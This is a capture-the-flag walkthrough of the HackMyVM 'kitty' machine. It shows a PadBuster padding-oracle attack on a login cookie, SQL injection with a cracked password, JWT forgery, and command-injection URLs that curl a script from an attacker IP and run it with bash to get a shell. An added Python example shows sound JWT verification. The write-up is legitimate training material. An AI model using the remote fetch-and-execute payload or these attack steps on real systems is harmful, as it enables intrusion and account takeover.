hackmyvm: kitty walkthrough
2022-08-02 03:59:00 [xdeclearn]
0x01 padding oracle
Port scan:
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp gitea
Accessing port 80 with curl redirects to http://kitty.hmv.
The site is static; ffuf turns up the virtual host name cookie.kitty.hmv.

Register the user test and inspect the cookie:

Crack the cookie with oraclepadding.pl (PadBuster).
* ~ ./oraclepadding.pl http://cookie.kitty.hmv/home/index.php OZcSZ4xSsGEpdRpik43lIg0RsEWxBcJG 8 -cookies "auth=OZcSZ4xSsGEpdRpik43lIg0RsEWxBcJG"
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| [email protected] |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 8144
INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 302 8144 ../login.php
2 ** 255 302 0 ../logout.php?err=1
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (237/256) [Byte 8]
[+] Success: (41/256) [Byte 7]
[+] Success: (219/256) [Byte 6]
[+] Success: (75/256) [Byte 5]
[+] Success: (240/256) [Byte 4]
[+] Success: (143/256) [Byte 3]
[+] Success: (29/256) [Byte 2]
[+] Success: (188/256) [Byte 1]
Block 1 Results:
[+] Cipher Text (HEX): 29751a62938de522
[+] Intermediate Bytes (HEX): 4ce47715b126d512
[+] Plain Text: user=tes
Use of uninitialized value $plainTextBytes in concatenation (.) or string at ./oraclepadding.pl line 361, <STDIN> line 1.
*** Starting Block 2 of 2 ***
[+] Success: (220/256) [Byte 8]
[+] Success: (32/256) [Byte 7]
[+] Success: (119/256) [Byte 6]
[+] Success: (112/256) [Byte 5]
[+] Success: (160/256) [Byte 4]
[+] Success: (229/256) [Byte 3]
[+] Success: (139/256) [Byte 2]
[+] Success: (171/256) [Byte 1]
Block 2 Results:
[+] Cipher Text (HEX): 0d11b045b105c246
[+] Intermediate Bytes (HEX): 5d721d65948ae225
[+] Plain Text: t
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): user=test
[+] Decrypted value (HEX): 757365723D7465737407070707070707
[+] Decrypted value (Base64): dXNlcj10ZXN0BwcHBwcHBw==
-------------------------------------------------------
Change the username to admin and obtain a new cookie.

0x02 SQL injection
After updating the cookie and refreshing the page, last_login.js appears; the interface that this JS calls is vulnerable to SQL injection.

Using sqlmap, retrieve the password hash and salt of the user gitea.
| 357f47546ba3ab1cf633d3d0c54e2583 | gitea |
| salt | YXZpam5leWFt |
Crack the password with hashcat:
* ~ hashcat -m 10 -a 0 357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt /usr/share/wordlists/rockyou.txt --show
357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt:git0ffme
0x03 OpenAPI to shell
Log in to host:3000 with the gitea account; a new subdomain turns up: http://whythisapiissofast.kitty.hmv.

Visit http://whythisapiissofast.kitty.hmv/openapi.json and inspect each API.

1. Visit the API http://whythisapiissofast.kitty.hmv/api/v2/-1, which returns the user nobody.

2. Visit the API http://whythisapiissofast.kitty.hmv/api/v2/-2, which returns a private key.

3. Obtain an access token as nobody; it is a JWT.

4. Crack the JWT's password (its signing secret) with hashcat.

5. Forge the token: change the user nobody to admin, set is_admin to 1, and extend the expiry time.

6. Execute commands through the API /api/v2/secure/{command}, but there is a filter here.

7. Use curl to download a malicious sh script remotely and run it with bash; this bypasses the filter and gives command execution, yielding a shell.
Here the nginx index must be changed to test.sh.

(1) whythisapiissofast.kitty.hmv/api/v2/secure/curl%20-o%20test.sh%20192.168.85.169%20-wget
(2) whythisapiissofast.kitty.hmv/api/v2/secure/bash%20test.sh%20-wget
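As an added example (not code from the box or from this walkthrough), this is the server-side check that the forged token in steps 3 to 5 only gets past because the secret was weak enough for hashcat: HS256 verification that pins the algorithm, compares the signature in constant time, requires an expiry, and derives the admin decision solely from verified claims. The key is a constructed random one; the is_admin claim name is the one the walkthrough shows.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time

# Constructed key: 256 random bits, not a dictionary word a wordlist could recover.
KEY = secrets.token_bytes(32)

def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_hs256(claims: dict, key: bytes) -> str:
    """Issue an HS256 token over the given claims."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url_encode(json.dumps(claims).encode())
    tag = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(tag)}"

def verify_hs256(token: str, key: bytes, now=None):
    """Return the claims only if algorithm, signature and expiry all check out."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        claims = json.loads(_b64url_decode(payload_b64))
        sig = _b64url_decode(sig_b64)
    except ValueError:  # wrong part count, bad base64 or bad JSON
        return None
    if not isinstance(header, dict) or not isinstance(claims, dict):
        return None
    # Pin the algorithm server-side; never let the token's own "alg" choose it.
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):  # constant-time comparison
        return None
    exp = claims.get("exp")  # expiry is mandatory, so a stretched exp is still bounded
    if not isinstance(exp, (int, float)) or exp <= (time.time() if now is None else now):
        return None
    return claims

def is_admin(token: str, key: bytes, now=None) -> bool:
    """Admin decision driven by the verified claims, never by the raw payload."""
    claims = verify_hs256(token, key, now)
    return claims is not None and claims.get("is_admin") == 1
```

With a 256-bit random key there is nothing for a wordlist attack to find, and a rewritten payload fails the signature check before any claim is read.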

0x04 get user flag
There are two users in the home directory.

Using the private key found earlier (from the /api/v2/-2 API), log in as the user dyutidhara over ssh and obtain the user flag.

0x05 root privilege escalation
Tried some methods and failed. If you have any success, please let me know in the comments; looking for help.